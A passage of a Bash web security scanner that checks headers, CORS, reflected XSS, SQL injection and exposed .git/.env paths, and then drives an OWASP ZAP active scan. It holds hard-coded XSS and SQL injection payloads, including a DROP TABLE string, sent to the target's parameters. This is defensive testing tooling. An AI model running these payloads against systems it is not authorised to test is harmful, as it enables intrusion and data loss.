    if [ $? -ne 0 ] || [ -z "$headers" ]; then
        handle_error "Failed to fetch HTTP headers from target" "run_security_headers_test():header_fetch" "curl -sI '$TARGET_URL' failed or returned empty response" "Check if target URL is accessible, verify network connectivity"
        return 1
    fi
    
    echo -e "${BLUE} Successfully retrieved headers from target${NC}"
    
    # Check for HSTS (only for HTTPS sites - HTTP doesn't need HSTS)
    if [[ "$TARGET_URL" == https://* ]]; then
        run_test "HSTS Header Present" "$headers" "Strict-Transport-Security" "false" "HSTS"
        if ! echo "$headers" | grep -qi "Strict-Transport-Security"; then
            LOW_RISK_FINDINGS=$((LOW_RISK_FINDINGS + 1))
            LOW_RISK_LIST+=("Missing HSTS Header")
        fi
    else
        echo -n "Testing: HSTS Header Present... "
        echo -e "${BLUE}SKIP${NC}"
        echo -e "${GRAY}  SKIP: HSTS not applicable to HTTP sites (use HTTPS for HSTS)${NC}"
        echo ""
    fi
    
    # Check for X-Frame-Options
    run_test "X-Frame-Options Header" "$headers" "X-Frame-Options" "false" "X-Frame-Options"
    if ! echo "$headers" | grep -qi "X-Frame-Options"; then
        LOW_RISK_FINDINGS=$((LOW_RISK_FINDINGS + 1))
        LOW_RISK_LIST+=("Missing X-Frame-Options Header")
    fi
    
    # Check for X-Content-Type-Options
    run_test "X-Content-Type-Options Header" "$headers" "X-Content-Type-Options" "false" "X-Content-Type-Options"
    if ! echo "$headers" | grep -qi "X-Content-Type-Options"; then
        LOW_RISK_FINDINGS=$((LOW_RISK_FINDINGS + 1))
        LOW_RISK_LIST+=("Missing X-Content-Type-Options Header")
    fi
    
    # Check for X-XSS-Protection
    run_test "X-XSS-Protection Header" "$headers" "X-XSS-Protection" "false" "X-XSS-Protection"
    if ! echo "$headers" | grep -qi "X-XSS-Protection"; then
        LOW_RISK_FINDINGS=$((LOW_RISK_FINDINGS + 1))
        LOW_RISK_LIST+=("Missing X-XSS-Protection Header")
    fi
    
    # Check for Content-Security-Policy
    run_test "Content-Security-Policy Header" "$headers" "Content-Security-Policy" "false" "Content-Security-Policy"
    if ! echo "$headers" | grep -qi "Content-Security-Policy"; then
        LOW_RISK_FINDINGS=$((LOW_RISK_FINDINGS + 1))
        LOW_RISK_LIST+=("Missing Content-Security-Policy Header")
    fi
    
    # Check for Referrer-Policy
    run_test "Referrer-Policy Header" "$headers" "Referrer-Policy" "false" "Referrer-Policy"
    if ! echo "$headers" | grep -qi "Referrer-Policy"; then
        LOW_RISK_FINDINGS=$((LOW_RISK_FINDINGS + 1))
        LOW_RISK_LIST+=("Missing Referrer-Policy Header")
    fi
    
    # Check server header (should be minimal)
    if echo "$headers" | grep -i "server:" | grep -qE "(Apache|nginx|IIS|lighttpd)" 2>/dev/null; then
        echo -e "${YELLOW} Server header reveals server type${NC}"
        log_result " WARNING: Server header reveals server type"
    fi
    
    # Context note about header importance
    echo -e "\n${CYAN}  NOTE: Well-configured sites (like GitHub) have all security headers.${NC}"
    echo -e "${CYAN}   Missing headers indicate opportunities to improve security posture.${NC}"
}

# Function to run CORS tests
run_cors_tests() {
    local phase_display=${PHASE_NUM:-2}
    echo -e "\n${YELLOW} PHASE $phase_display: CORS SECURITY TESTS${NC}"
    
    # Test CORS with evil origin - check both OPTIONS preflight AND main GET response
    evil_origin="https://evil-site.com"
    
    # Test OPTIONS preflight request
    cors_preflight_response=$(curl -s --connect-timeout 10 --max-time 30 -H "Origin: $evil_origin" \
        -H "Access-Control-Request-Method: POST" \
        -X OPTIONS "$TARGET_URL" 2>/dev/null || echo "")
    
    # Test main GET request with evil origin
    cors_main_response=$(curl -s --connect-timeout 10 --max-time 30 -I -H "Origin: $evil_origin" "$TARGET_URL" 2>/dev/null || echo "")
    
    # Check if CORS allows any origin (bad) - check both responses
    cors_wildcard_found=false
    if echo "$cors_preflight_response" | grep -qi "access-control-allow-origin:.*\*"; then
        cors_wildcard_found=true
    elif echo "$cors_main_response" | grep -qi "access-control-allow-origin:.*\*"; then
        cors_wildcard_found=true
    fi
    
    if [ "$cors_wildcard_found" = "true" ]; then
        echo -e "${RED}FAIL: CORS Wildcard Protection${NC}"
        echo -e "${YELLOW} FOUND: CORS Wildcard Origin (*)${NC}"
        echo "   RISK: High - Allows any website to access your API"
        echo "   WHAT: Access-Control-Allow-Origin: * allows all domains"
        echo "   FIX: Specify exact origins: Access-Control-Allow-Origin: https://yourdomain.com"
        echo "   NEVER: Use '*' with credentials (Access-Control-Allow-Credentials: true)"
        echo "   DETECTED IN: $(echo "$cors_main_response" | grep -i "access-control-allow-origin" || echo "preflight response")"
        echo ""
        HIGH_RISK_FINDINGS=$((HIGH_RISK_FINDINGS + 1))
        HIGH_RISK_LIST+=("CORS Wildcard Origin (*)")
        TESTS_FAILED=$((TESTS_FAILED + 1))
    else
        echo -e "${GREEN}PASS: CORS Wildcard Protection${NC}"
        TESTS_PASSED=$((TESTS_PASSED + 1))
        log_result " PASS: CORS Wildcard Protection"
    fi
    TESTS_TOTAL=$((TESTS_TOTAL + 1))
    
    # Test if evil origin is accepted (bad) - check both responses
    evil_origin_accepted=false
    if echo "$cors_preflight_response" | grep -q "$evil_origin"; then
        evil_origin_accepted=true
    elif echo "$cors_main_response" | grep -q "$evil_origin"; then
        evil_origin_accepted=true
    fi
    
    if [ "$evil_origin_accepted" = "true" ]; then
        echo -e "${RED}FAIL: Evil Origin Rejection${NC}"
        echo -e "${YELLOW} FOUND: Evil Origin Accepted${NC}"
        echo "   RISK: High - Malicious websites can access your resources"
        echo "   WHAT: Server accepts requests from unauthorized origin: $evil_origin"
        echo "   FIX: Implement proper origin whitelist checking"
        echo "   EXAMPLE: Only allow trusted domains like https://yourdomain.com"
        echo ""
        HIGH_RISK_FINDINGS=$((HIGH_RISK_FINDINGS + 1))
        HIGH_RISK_LIST+=("Evil Origin Accepted")
        TESTS_FAILED=$((TESTS_FAILED + 1))
    else
        echo -e "${GREEN}PASS: Evil Origin Rejection${NC}"
        TESTS_PASSED=$((TESTS_PASSED + 1))
        log_result " PASS: Evil Origin Rejection"
    fi
    TESTS_TOTAL=$((TESTS_TOTAL + 1))
    
    # Test common endpoints for CORS issues
    for endpoint in "/api" "/admin" "/login" "/auth"; do
        cors_test=$(curl -s --connect-timeout 10 --max-time 30 -H "Origin: $evil_origin" -X OPTIONS "${TARGET_URL}${endpoint}" 2>/dev/null || echo "")
        if echo "$cors_test" | grep -q "Access-Control-Allow-Origin"; then
            log_result " CORS headers found on: ${endpoint}"
        fi
    done
}

# Function to run XSS tests
run_xss_tests() {
    local phase_display=${PHASE_NUM:-3}
    echo -e "\n${YELLOW} PHASE $phase_display: XSS VULNERABILITY TESTS${NC}"
    
    # Common XSS payloads
    xss_payloads=(
        "<script>alert('XSS')</script>"
        "javascript:alert('XSS')"
        "'\"><script>alert('XSS')</script>"
        "<img src=x onerror=alert('XSS')>"
        "<svg onload=alert('XSS')>"
    )
    
    # Test common parameters
    common_params=("q" "search" "query" "name" "message" "comment" "text" "input")
    
    for param in "${common_params[@]}"; do
        for payload in "${xss_payloads[@]}"; do
            # URL encode payload
            encoded_payload=$(echo "$payload" | sed 's/ /%20/g' | sed 's/</%3C/g' | sed 's/>/%3E/g')
            
            # Test GET paramete
            response=$(curl -s --connect-timeout 10 --max-time 30 "${TARGET_URL}?${param}=${encoded_payload}" 2>/dev/null || echo "")
            
            # Check if payload is reflected unescaped
            if echo "$response" | grep -q "$payload"; then
                echo -e "${RED} Potential XSS in parameter: $param${NC}"
                echo -e "${YELLOW} FOUND: Reflected XSS Vulnerability in parameter '$param'${NC}"
                echo "   RISK: High - Remote code execution in user browsers"
                echo "   WHAT: User input '$param' reflected in HTML without proper escaping"
                echo "   PAYLOAD: $payload"
                echo "   FIX: Sanitize ALL user input, use output encoding, implement CSP"
                echo "   EXAMPLE: HTML encode: &lt;script&gt; instead of <script>"
                echo "   CSP: Content-Security-Policy: default-src 'self'; script-src 'self'"
                echo ""
                HIGH_RISK_FINDINGS=$((HIGH_RISK_FINDINGS + 1))
                HIGH_RISK_LIST+=("XSS Vulnerability in parameter '$param'")
                break
            fi
        done
    done
    
    run_test "XSS Protection Test" "Completed XSS parameter testing" "Completed"
}

# Function to run SQL injection tests
run_sql_injection_tests() {
    local phase_display=${PHASE_NUM:-4}
    echo -e "\n${YELLOW} PHASE $phase_display: SQL INJECTION TESTS${NC}"
    
    # Common SQL injection payloads
    sql_payloads=(
        "' OR '1'='1"
        "'; DROP TABLE users; --"
        "' UNION SELECT null, null, null --"
        "admin'--"
        "' OR 1=1 --"
        "' WAITFOR DELAY '00:00:05' --"
    )
    
    # Common vulnerable parameters
    sql_params=("id" "user" "username" "email" "search" "category" "page" "limit")
    
    for param in "${sql_params[@]}"; do
        for payload in "${sql_payloads[@]}"; do
            # URL encode payload
            encoded_payload=$(echo "$payload" | sed "s/ /%20/g" | sed "s/'/%27/g")
            
            # Test paramete
            response=$(curl -s --connect-timeout 10 --max-time 30 "${TARGET_URL}?${param}=${encoded_payload}" 2>/dev/null || echo "")
            
            # Check for specific SQL error messages (more accurate detection)
            if echo "$response" | grep -qiE "(sql syntax|mysql_.*error|postgresql.*error|ora-[0-9]+|mssql.*error|sqlite.*error|you have an error in your sql|syntax error.*sql|duplicate entry|table.*doesn't exist|column.*unknown|invalid.*query)"; then
                echo -e "${RED} Potential SQL injection in parameter: $param${NC}"
                echo -e "${YELLOW} FOUND: SQL Injection Vulnerability in parameter '$param'${NC}"
                echo "   RISK: High - Database compromise, data theft possible"
                echo "   WHAT: User input '$param' causes SQL error - likely injectable"
                echo "   PAYLOAD: $payload"
                echo "   FIX: Use parameterized queries/prepared statements ALWAYS"
                echo "   EXAMPLE: SELECT * FROM users WHERE id = ? (NOT WHERE id = '\$user_input')"
                echo "   NEVER: Concatenate user input directly into SQL queries"
                echo ""
                HIGH_RISK_FINDINGS=$((HIGH_RISK_FINDINGS + 1))
                HIGH_RISK_LIST+=("SQL Injection in parameter '$param'")
                break
            fi
        done
    done
    
    run_test "SQL Injection Protection Test" "Completed SQL injection testing" "Completed"
}

# Function to run information disclosure tests
run_info_disclosure_tests() {
    local phase_display=${PHASE_NUM:-5}
    echo -e "\n${YELLOW} PHASE $phase_display: INFORMATION DISCLOSURE TESTS${NC}"
    
    # High-confidence sensitive files/directories (reduced false positives)
    sensitive_paths=(
        "/.git"
        "/.env"
        "/phpmyadmin"
        "/admin"
    )
    
    for path in "${sensitive_paths[@]}"; do
        # Get both status code and content for better detection
        response=$(curl -s --connect-timeout 10 --max-time 30 "${TARGET_URL}${path}" 2>/dev/null || echo "ERROR")
        status_code=$(curl -s --connect-timeout 10 --max-time 30 -o /dev/null -w "%{http_code}" "${TARGET_URL}${path}" 2>/dev/null || echo "000")
        
        # Enhanced detection logic
        is_real_finding=false
        
        if [ "$status_code" = "200" ]; then
            case "$path" in
                "/.git")
                    # .git directory should contain git-specific content
                    if echo "$response" | grep -qi "objects\|refs\|HEAD"; then
                        is_real_finding=true
                    fi
                    ;;
                "/.env")
                    # .env files should contain environment variables
                    if echo "$response" | grep -qE "^[A-Z_]+=|APP_|DB_|API_"; then
                        is_real_finding=true
                    fi
                    ;;
                "/phpmyadmin")
                    # phpMyAdmin should have specific login interface elements
                    if echo "$response" | grep -qi "pma_username\|pma_password\|phpmyadmin.*login\|server.*choice" && \
                       ! echo "$response" | grep -qi "github\|repository"; then
                        is_real_finding=true
                    fi
                    ;;
                "/admin")
                    # Admin interface should have login form AND not be a generic site page
                    if echo "$response" | grep -qi "admin.*login\|admin.*password\|admin.*dashboard" && \
                       echo "$response" | grep -qi "<input.*password\|<form.*login" && \
                       ! echo "$response" | grep -qi "github\|repository"; then
                        is_real_finding=true
                    fi
                    ;;
            esac
        fi
        
        if [ "$is_real_finding" = "true" ]; then
            echo -e "${YELLOW} Accessible: $path (HTTP $status_code)${NC}"
            
            # Provide detailed explanations based on path type
            case "$path" in
                "/.git")
                    get_finding_details "Info-Git"
                    echo ""
                    HIGH_RISK_FINDINGS=$((HIGH_RISK_FINDINGS + 1))
                    HIGH_RISK_LIST+=(".git directory accessible")
                    ;;
                "/.env")
                    get_finding_details "Info-Env"
                    echo ""
                    HIGH_RISK_FINDINGS=$((HIGH_RISK_FINDINGS + 1))
                    HIGH_RISK_LIST+=(".env file accessible")
                    ;;
                "/admin"|"/phpmyadmin")
                    echo " FOUND: Admin Interface Accessible"
                    echo "   RISK: Medium - Admin interface exposed to public"
                    echo "   WHAT: Administrative interface accessible without authentication"
                    echo "   FIX: Restrict access by IP, implement proper authentication"
                    echo "   EXAMPLE: Allow only from trusted IPs (10.0.0.0/8, office IPs)"
                    echo ""
                    MEDIUM_RISK_FINDINGS=$((MEDIUM_RISK_FINDINGS + 1))
                    MEDIUM_RISK_LIST+=("Admin interface accessible: $path")
                    ;;
                *)
                    MEDIUM_RISK_FINDINGS=$((MEDIUM_RISK_FINDINGS + 1))
                    MEDIUM_RISK_LIST+=("Sensitive content accessible: $path")
                    ;;
            esac
        elif [ "$status_code" = "403" ]; then
            echo -e "${CYAN} Forbidden: $path (HTTP $status_code)${NC}"
            log_result " PASS: Path properly protected: $path"
        fi
    done
    
    run_test "Information Disclosure Test" "Completed path enumeration" "Completed"
}

# Function to run ZAP scan
run_zap_scan() {
    local phase_display=${PHASE_NUM:-6}
    echo -e "\n${YELLOW} PHASE $phase_display: OWASP ZAP VULNERABILITY SCAN${NC}"
    
    if ! start_zap_if_needed; then
        echo -e "${RED} Cannot run ZAP scan - ZAP not available${NC}"
        return 1
    fi
    
    # Use reliable bash-based ZAP scan (no Python dependencies)
    echo -e "${CYAN} Running comprehensive ZAP vulnerability scan via REST API${NC}"
    echo -e "${BLUE} Features: Spider crawling, passive analysis, active scanning, terminal results${NC}"
    run_basic_zap_scan
}

# Function to run basic ZAP scan (original functionality)
run_basic_zap_scan() {
    echo " Starting basic vulnerability scan..."
    
    # Set up ZAP context
    curl -s "http://${ZAP_HOST}:${ZAP_PORT}/JSON/context/action/newContext/?contextName=GenericTest" >/dev/null 2>&1
    
    # Add target to context (comprehensive coverage for local testing)
    curl -s "http://${ZAP_HOST}:${ZAP_PORT}/JSON/context/action/includeInContext/?contextName=GenericTest&regex=${TARGET_URL}.*" >/dev/null 2>&1
    
    # Configure ZAP for DEEP PENETRATION TESTING (comprehensive security analysis)
    echo " Configuring ZAP for MAXIMUM THOROUGHNESS deep penetration testing..."
    echo -e "${RED} EXTREME MODE: Maximum attack strength, extended timeouts, comprehensive coverage${NC}"
    echo -e "${BLUE} This will take significantly longer but find more vulnerabilities${NC}"
    
    # SPIDER CONFIGURATION - MAXIMUM THOROUGHNESS (Deep Penetration Testing)
    curl -s "http://${ZAP_HOST}:${ZAP_PORT}/JSON/spider/action/setOptionMaxDepth/?Integer=10" >/dev/null 2>&1        # Max 10 levels deep (was 6)
    curl -s "http://${ZAP_HOST}:${ZAP_PORT}/JSON/spider/action/setOptionMaxChildren/?Integer=100" >/dev/null 2>&1    # Max 100 URLs per node (was 50)
    curl -s "http://${ZAP_HOST}:${ZAP_PORT}/JSON/spider/action/setOptionMaxDuration/?Integer=900" >/dev/null 2>&1     # Max 15 minutes spider (was 5)
    curl -s "http://${ZAP_HOST}:${ZAP_PORT}/JSON/spider/action/setOptionMaxParseSizeBytes/?Integer=52428800" >/dev/null 2>&1  # 50MB per page (was 10MB)
    curl -s "http://${ZAP_HOST}:${ZAP_PORT}/JSON/spider/action/setOptionRequestWaitTime/?Integer=200" >/dev/null 2>&1  # Slower but thorough (was 100ms)
    
    # Add URL exclusions to prevent noise (Next.js, static files, etc.)
    # Note: Using core exclusions instead of spider-specific ones for broader coverage
    curl -s "http://${ZAP_HOST}:${ZAP_PORT}/JSON/core/action/excludeFromProxy/?regex=.*\.(js|css|png|jpg|jpeg|gif|ico|svg|woff|woff2|ttf|eot|pdf)(\\\?.*)?$" >/dev/null 2>&1
    curl -s "http://${ZAP_HOST}:${ZAP_PORT}/JSON/core/action/excludeFromProxy/?regex=.*/_next/static/.*" >/dev/null 2>&1
    curl -s "http://${ZAP_HOST}:${ZAP_PORT}/JSON/core/action/excludeFromProxy/?regex=.*\\\?ts=[0-9]+.*" >/dev/null 2>&1
    curl -s "http://${ZAP_HOST}:${ZAP_PORT}/JSON/core/action/excludeFromProxy/?regex=.*\.(git|svn).*" >/dev/null 2>&1
    
    # Enable essential spidering techniques (balanced approach)
    curl -s "http://${ZAP_HOST}:${ZAP_PORT}/JSON/spider/action/setOptionProcessForm/?Boolean=true" >/dev/null 2>&1   # Process forms
    curl -s "http://${ZAP_HOST}:${ZAP_PORT}/JSON/spider/action/setOptionPostForm/?Boolean=false" >/dev/null 2>&1     # Don't auto-submit forms (reduces noise)
    curl -s "http://${ZAP_HOST}:${ZAP_PORT}/JSON/spider/action/setOptionParseComments/?Boolean=true" >/dev/null 2>&1 # Parse HTML comments
    curl -s "http://${ZAP_HOST}:${ZAP_PORT}/JSON/spider/action/setOptionParseRobotsTxt/?Boolean=true" >/dev/null 2>&1 # Check robots.txt
    curl -s "http://${ZAP_HOST}:${ZAP_PORT}/JSON/spider/action/setOptionParseSitemapXml/?Boolean=false" >/dev/null 2>&1 # Skip sitemap (can be huge)
    curl -s "http://${ZAP_HOST}:${ZAP_PORT}/JSON/spider/action/setOptionParseSVNEntries/?Boolean=false" >/dev/null 2>&1 # Skip .svn (rarely needed)
    curl -s "http://${ZAP_HOST}:${ZAP_PORT}/JSON/spider/action/setOptionParseGit/?Boolean=false" >/dev/null 2>&1      # Skip .git (can generate many URLs)
    
    # ACTIVE SCAN CONFIGURATION - MAXIMUM THOROUGHNESS (Deep Penetration Testing)
    curl -s "http://${ZAP_HOST}:${ZAP_PORT}/JSON/ascan/action/setOptionDelayInMs/?Integer=300" >/dev/null 2>&1        # Slower, more thorough (was 100ms)
    curl -s "http://${ZAP_HOST}:${ZAP_PORT}/JSON/ascan/action/setOptionThreadPerHost/?Integer=5" >/dev/null 2>&1      # 5 concurrent threads (was 3)
    curl -s "http://${ZAP_HOST}:${ZAP_PORT}/JSON/ascan/action/setOptionMaxRuleDurationInMins/?Integer=10" >/dev/null 2>&1  # Max 10 min per rule (was 2)
    curl -s "http://${ZAP_HOST}:${ZAP_PORT}/JSON/ascan/action/setOptionMaxScanDurationInMins/?Integer=60" >/dev/null 2>&1  # Max 60 min total (was 10)
    curl -s "http://${ZAP_HOST}:${ZAP_PORT}/JSON/ascan/action/setOptionMaxResultsToList/?Integer=500" >/dev/null 2>&1   # More results (was 100)
    
    # Enable MAXIMUM vulnerability detection (thoroughness over speed)
    curl -s "http://${ZAP_HOST}:${ZAP_PORT}/JSON/ascan/action/setOptionAttackStrength/?String=HIGH" >/dev/null 2>&1   # HIGH attack strength (was MEDIUM)
    curl -s "http://${ZAP_HOST}:${ZAP_PORT}/JSON/ascan/action/setOptionAlertThreshold/?String=LOW" >/dev/null 2>&1    # LOW threshold for maximum detection (was MEDIUM)
    
    # Spider the target (comprehensive discovery)
    echo " Deep spidering - discovering ALL pages, forms, and endpoints..."
    spider_response=$(curl -s "http://${ZAP_HOST}:${ZAP_PORT}/JSON/spider/action/scan/?url=${TARGET_URL}" 2>/dev/null)
    
    # Enhanced error checking for spider scan
    if [ $? -ne 0 ]; then
        handle_error "Failed to connect to ZAP for spider scan" "run_basic_zap_scan():spider_start" "curl command failed to reach ZAP API" "Ensure ZAP is running on ${ZAP_HOST}:${ZAP_PORT}"
        return 1
    fi
    
    # Check if jq is available for JSON parsing
    if ! command -v jq >/dev/null 2>&1; then
        handle_error "jq not found - required for ZAP result parsing" "run_basic_zap_scan():json_parsing" "jq command not available in PATH" "Install jq: brew install jq (macOS) or apt-get install jq (Linux)"
        return 1
    fi
    
    spider_id=$(echo "$spider_response" | jq -r '.scan // empty' 2>/dev/null)
    
    if [ -z "$spider_id" ] || [ "$spider_id" = "empty" ] || [ "$spider_id" = "null" ]; then
        handle_error "Failed to start spider scan - invalid response from ZAP" "run_basic_zap_scan():spider_start" "ZAP returned: $spider_response" "Check ZAP logs, ensure target URL is accessible, verify ZAP API is working"
        return 1
    fi
    
    echo -e "${BLUE} Started spider scan (ID: $spider_id)${NC}"
    
    # Debug mode - show ZAP URLs being tested
    if [ "${DEBUG:-}" = "1" ]; then
        echo -e "${GRAY} Debug: Testing ${TARGET_URL}${NC}"
        echo -e "${GRAY} Debug: ZAP running on ${ZAP_HOST}:${ZAP_PORT}${NC}"
    fi
    
    # Wait for spider to complete (unlimited - deep penetration testing)
    spider_elapsed=0
    echo -e "${BLUE} Comprehensive discovery - will find ALL pages, forms, and hidden content${NC}"
    while true; do
        spider_status=$(curl -s "http://${ZAP_HOST}:${ZAP_PORT}/JSON/spider/view/status/?scanId=${spider_id}" | jq -r '.status // "0"' 2>/dev/null)
        if [ "$spider_status" = "100" ]; then
            break
        fi
        
        # Show detailed progress every 30 seconds
        if [ $((spider_elapsed % 30)) -eq 0 ] && [ $spider_elapsed -gt 0 ]; then
            urls_found=$(curl -s "http://${ZAP_HOST}:${ZAP_PORT}/JSON/spider/view/results/?scanId=${spider_id}" | jq -r '.results | length // 0' 2>/dev/null)
            echo -e "\n${BLUE} Deep spider progress: ${spider_status}% - Found ${urls_found} URLs (${spider_elapsed}s elapsed)${NC}"
        fi
        
        echo -n "."
        sleep 2
        spider_elapsed=$((spider_elapsed + 2))
    done
    
    # Get final spider results
    urls_found=$(curl -s "http://${ZAP_HOST}:${ZAP_PORT}/JSON/spider/view/results/?scanId=${spider_id}" | jq -r '.results | length // 0' 2>/dev/null)
    echo -e " ${GREEN} Deep spidering completed - ${urls_found} URLs discovered (${spider_elapsed}s)${NC}"
    
    # Show sample URLs for debugging (first 10)
    if [ "$urls_found" -gt 100 ]; then
        echo -e "${YELLOW} Sample URLs found (showing first 10 of ${urls_found}):${NC}"
        curl -s "http://${ZAP_HOST}:${ZAP_PORT}/JSON/spider/view/results/?scanId=${spider_id}" | \
        jq -r '.results[0:10][]?' 2>/dev/null | while read url; do
            echo -e "${GRAY}   $url${NC}"
        done
        echo -e "${YELLOW}  ... and $((urls_found - 10)) more${NC}"
    fi
    
    # Passive scan (automatic)
    echo " Running passive security scan..."
    sleep 5
    
    # Active scan with timeout and progress (skip if quick mode)
    if [ "$MODE" = "quick" ]; then
        echo -e "${BLUE} Skipping active scan in quick mode${NC}"
        echo -e "${BLUE} Use 'full' mode for comprehensive vulnerability scanning${NC}"
    else
        echo " Running active vulnerability scan..."
        echo -e "${RED} PENETRATION MODE: All 50+ security rules, HIGH attack strength, LOW threshold${NC}"
        echo -e "${RED} This can take 15+ minutes depending on the size of the website but will find ALL possible vulnerabilities${NC}"
        
        # Start comprehensive active scan (already configured above)
        active_scan_response=$(curl -s "http://${ZAP_HOST}:${ZAP_PORT}/JSON/ascan/action/scan/?url=${TARGET_URL}" 2>/dev/null)
        
        # Enhanced error checking for active scan
        if [ $? -ne 0 ]; then
            handle_error "Failed to connect to ZAP for active scan" "run_basic_zap_scan():active_scan_start" "curl command failed to reach ZAP API" "Ensure ZAP is running and responsive on ${ZAP_HOST}:${ZAP_PORT}"
            return 1
        fi
        
        active_scan_id=$(echo "$active_scan_response" | jq -r '.scan // empty' 2>/dev/null)
        
        if [ -z "$active_scan_id" ] || [ "$active_scan_id" = "empty" ] || [ "$active_scan_id" = "null" ]; then
            handle_error "Failed to start active scan - invalid response from ZAP" "run_basic_zap_scan():active_scan_start" "ZAP returned: $active_scan_response" "Check if spider found any URLs to scan, verify ZAP active scan configuration"
            return 1
        fi
        
        echo -e "${BLUE} Started active scan (ID: $active_scan_id)${NC}"
        
        # Wait for comprehensive active scan to complete (unlimited - deep penetration)
        active_elapsed=0
        progress_interval=60  # Show detailed progress every minute
        last_progress=0
        
        echo -e "${BLUE} Comprehensive vulnerability analysis in progress...${NC}"
        echo -e "${BLUE} Testing: XSS, SQLi, Command injection, Path traversal, XXE, CSRF, etc.${NC}"
        
        while true; do
            scan_status=$(curl -s "http://${ZAP_HOST}:${ZAP_PORT}/JSON/ascan/view/status/?scanId=${active_scan_id}" | jq -r '.status // "0"' 2>/dev/null)
            if [ "$scan_status" = "100" ]; then
                break
            fi
            
            # Show detailed progress every minute
            if [ $((active_elapsed - last_progress)) -ge $progress_interval ]; then
                # Get current vulnerability counts using jq
                current_alerts=$(curl -s "http://${ZAP_HOST}:${ZAP_PORT}/JSON/core/view/alerts/" | jq -r '.alerts | length // 0' 2>/dev/null)
                echo -e "\n${RED} Smart scan progress: ${scan_status}% - Found ${current_alerts} issues (${active_elapsed}s)${NC}"
                echo -e "${BLUE} Testing: XSS, SQLi, Command injection, Path traversal, XXE, CSRF...${NC}"
                last_progress=$active_elapsed
            fi
            
            echo -n "."
            sleep 5
            active_elapsed=$((active_elapsed + 5))
        done
        
        # Get final results
        final_alerts=$(curl -s "http://${ZAP_HOST}:${ZAP_PORT}/JSON/core/view/alerts/" | jq -r '.alerts | length // 0' 2>/dev/null)
        echo -e " ${GREEN} Smart penetration scan completed - ${final_alerts} security issues found (${active_elapsed}s)${NC}"
    fi
    
    # Get comprehensive vulnerability findings for deep penetration testing
    echo -e "\n${PURPLE} DEEP PENETRATION TESTING RESULTS${NC}"
    echo -e "${PURPLE}===================================${NC}"
    
    alerts=$(curl -s "http://${ZAP_HOST}:${ZAP_PORT}/JSON/core/view/alerts/")
    
    # Populate finding lists with actual ZAP results (deduplicated and filtered) - Fixed subshell issue
    # Use temporary files to avoid subshell array population issues
    high_findings=$(echo "$alerts" | jq -r '.alerts[] | select(.risk == "High") | .name' 2>/dev/null | sort | uniq)
    if [ -n "$high_findings" ]; then
        # Convert to array using word splitting (POSIX compatible)
        HIGH_RISK_LIST=()
        IFS=$'\n'
        for finding in $high_findings; do
            [ -n "$finding" ] && HIGH_RISK_LIST+=("$finding")
        done
        unset IFS
    fi
    
    medium_findings=$(echo "$alerts" | jq -r '.alerts[] | select(.risk == "Medium") | .name' 2>/dev/null | sort | uniq)
    if [ -n "$medium_findings" ]; then
        MEDIUM_RISK_LIST=()
        IFS=$'\n'
        for finding in $medium_findings; do
            [ -n "$finding" ] && MEDIUM_RISK_LIST+=("$finding")
        done
        unset IFS
    fi
    
    low_findings=$(echo "$alerts" | jq -r '.alerts[] | select(.risk == "Low") | .name' 2>/dev/null | sort | uniq)
    if [ -n "$low_findings" ]; then
        LOW_RISK_LIST=()
        IFS=$'\n'
        for finding in $low_findings; do
            [ -n "$finding" ] && LOW_RISK_LIST+=("$finding")
        done
        unset IFS
    fi
    
    # Count risk levels using actual unique findings (not raw ZAP counts)
    HIGH_RISK_FINDINGS=${#HIGH_RISK_LIST[@]}
    MEDIUM_RISK_FINDINGS=${#MEDIUM_RISK_LIST[@]}
    LOW_RISK_FINDINGS=${#LOW_RISK_LIST[@]}
    
    # Filter noise from informational findings - Fixed subshell issue
    info_findings=$(echo "$alerts" | jq -r '.alerts[] | select(.risk == "Informational") | .name' 2>/dev/null | sort | uniq)
    if [ -n "$info_findings" ]; then
        INFO_LIST=()
        IFS=$'\n'
        for finding in $info_findings; do
            # Skip noise findings that aren't valuable
            if [ "$finding" != "User Agent Fuzzer" ] && [ "${finding#*Modern Web Application}" = "$finding" ]; then
                [ -n "$finding" ] && INFO_LIST+=("$finding")
            fi
        done
        unset IFS
    fi
    
    # Get informational findings count
    INFORMATIONAL_FINDINGS=${#INFO_LIST[@]}
    
    # Show detailed vulnerability breakdown with accurate counts and explanations
    if [ $HIGH_RISK_FINDINGS -gt 0 ]; then
        echo -e "${RED} HIGH RISK: ${HIGH_RISK_FINDINGS}${NC}"
    else
        echo -e "${GREEN} HIGH RISK: 0  (Excellent - No critical vulnerabilities found)${NC}"
    fi
    
    if [ $MEDIUM_RISK_FINDINGS -gt 0 ]; then
        echo -e "${YELLOW}  MEDIUM RISK: ${MEDIUM_RISK_FINDINGS}${NC}"
    else
        echo -e "${GREEN}  MEDIUM RISK: 0  (Good - No medium-risk vulnerabilities found)${NC}"
    fi
    
    if [ $LOW_RISK_FINDINGS -gt 0 ]; then
        echo -e "${BLUE}  LOW RISK: ${LOW_RISK_FINDINGS}${NC}"
    else
        echo -e "${GREEN}  LOW RISK: 0  (Good - No low-risk vulnerabilities found)${NC}"
    fi
    
    if [ $INFORMATIONAL_FINDINGS -gt 0 ]; then
        echo -e "${GRAY} INFORMATIONAL: ${INFORMATIONAL_FINDINGS}${NC}"
    else
        echo -e "${GRAY} INFORMATIONAL: 0 (No informational findings after noise filtering)${NC}"
    fi
    
    # Show top vulnerability types found
    if [ "$HIGH_RISK_FINDINGS" -gt 0 ] || [ "$MEDIUM_RISK_FINDINGS" -gt 0 ]; then
        echo -e "\n${RED} TOP VULNERABILITY CLASSES DETECTED:${NC}"
        
        # Extract and show unique vulnerability types using jq
        echo "$alerts" | jq -r '
            [.alerts[].name] 
            | group_by(.) 
            | map({name: .[0], count: length}) 
            | sort_by(.count) 
            | reverse 
            | .[0:10][] 
            | "   \(.name) (\(.count) instances)"
        ' 2>/dev/null | while read line; do
            echo -e "${YELLOW}${line}${NC}"
        done || echo -e "${YELLOW}   Unable to parse vulnerability details${NC}"
    fi
    
    echo -e "\n${GREEN} Deep penetration testing completed${NC}"
    echo -e "${GREEN} Total Security Issues Found: $((HIGH_RISK_FINDINGS + MEDIUM_RISK_FINDINGS + LOW_RISK_FINDINGS + INFORMATIONAL_FINDINGS))${NC}"
}

# ===========================================
# NEW PHASE 7: AUTHENTICATION SECURITY TESTING
# ===========================================

run_authentication_tests() {
    local phase_display=${PHASE_NUM:-7}
    echo -e "\n${YELLOW} PHASE $phase_display: AUTHENTICATION SECURITY TESTING ${NC}"
    
    if [ "$AUTH_TYPE" = "none" ]; then
        echo -e "${BLUE} Authentication testing skipped (--auth-type not specified)${NC}"
